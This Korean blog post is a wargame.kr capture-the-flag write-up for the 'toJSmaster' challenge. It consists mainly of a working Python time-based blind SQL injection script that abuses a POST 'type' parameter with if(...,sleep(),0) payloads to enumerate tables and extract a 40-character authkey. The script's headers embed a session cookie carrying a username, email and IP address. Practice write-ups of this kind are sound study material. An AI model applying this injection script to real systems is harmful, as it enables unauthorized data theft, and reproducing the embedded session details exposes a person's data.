toJSmaster 메뉴에서 type등 여러 parameter가 post방식으로 전송되는데 type을 이용했다.

type=if(***,sleep(10),0) 으로 줘서 ㄱㄱ 



import http.client
import string
from urllib import parse
import time
char='0123456789'+string.ascii_letters+'_-+=~!@#$%^&*(),.?/][{}()'
def blind(q):
	con=http.client.HTTPConnection('wargame.kr:8080')
	head={'Content-type': 'application/x-www-form-urlencoded','Accept': 'text/plain','Cookie':'chat_id=admin&ci_session=a%3A11%3A%7Bs%3A10%3A%22session_id%22%3Bs%3A32%3A%220187213e7d32f2fa412fd125819038f7%22%3Bs%3A10%3A%22ip_address%22%3Bs%3A14%3A%22175.192.180.13%22%3Bs%3A10%3A%22user_agent%22%3Bs%3A109%3A%22Mozilla%2F5.0+%28Windows+NT+10.0%3B+WOW64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F56.0.2924.87+Safari%2F537.36%22%3Bs%3A13%3A%22last_activity%22%3Bi%3A1488460400%3Bs%3A9%3A%22user_data%22%3Bs%3A0%3A%22%22%3Bs%3A4%3A%22name%22%3Bs%3A5%3A%22shnec%22%3Bs%3A5%3A%22email%22%3Bs%3A17%3A%22sh3077k%40naver.com%22%3Bs%3A4%3A%22lang%22%3Bs%3A3%3A%22kor%22%3Bs%3A11%3A%22achievement%22%3Bs%3A7%3A%22default%22%3Bs%3A5%3A%22point%22%3Bs%3A5%3A%2213400%22%3Bs%3A14%3A%22last_auth_time%22%3Bi%3A1488459621%3B%7Dbcdd3ec89a464540180207d0b8cc5ce78a10c026&PHPSESSID=ntplo3lmasflgra1r3vavqa6h2'}
	params=parse.urlencode({'cont':'aaaa','mail':'guest','type':q})
	con.request('POST','/qna/?page=to_jsmaster',params,headers=head)
	t1=time.time()
	res=con.getresponse().read()
	t2=time.time()
	#print(res)
	return t2-t1>7

def table(n):
	for i in range(n):
		ans=''
		for j in range(1,8):
			for c in char:
				qq='if((select ascii(substr(table_name,{},1)) from information_schema.tables where table_type=0x62617365207461626c65 limit {},1)={},sleep(5),0)'.format(j,i,ord(c))
				if blind(qq):
					ans+=c
					print('[*]find '+ans)
		print('[**]table_name : '+ans)
def key(column,table,length):
	ans=''
	for i in range(1,length+1):
		for c in char:
			qq='if((select ascii(substr({},{},1)) from {})={},sleep(10),0)'.format(column,i,table,ord(c))
			if blind(qq):
				ans+=c
				print('[*]find{} '.format(i)+ans)
				break
	print('[***]key : '+ans)


#table count : 2
#type=if((select length(table_name) from information_schema.tables where table_type=0x62617365207461626c65 limit 1,1)>0,sleep(5),0)
#table_length : first table=7 secondtable=7
#type=if((select length(table_name) from information_schema.tables where table_type=0x62617365207461626c65 limit 1,1)=7,sleep(5),0)
#table1 : authkey & column : authkey(guessing) & authkey length=40 | table2 : mqessage

table(2)
key('authkey','authkey',40)

'war game > wargame.kr' 카테고리의 다른 글

[wargame.kr]Crypto Crackme Basic  (0) 2017.03.08
[wargame.kr]adm1nkyj  (2) 2017.03.03
[wargame.kr]ip_log_table  (0) 2017.03.02
[wargame.kr]lonely_guys  (0) 2017.03.02
[wargame.kr]dmbs335  (0) 2017.02.25

+ Recent posts

티스토리툴바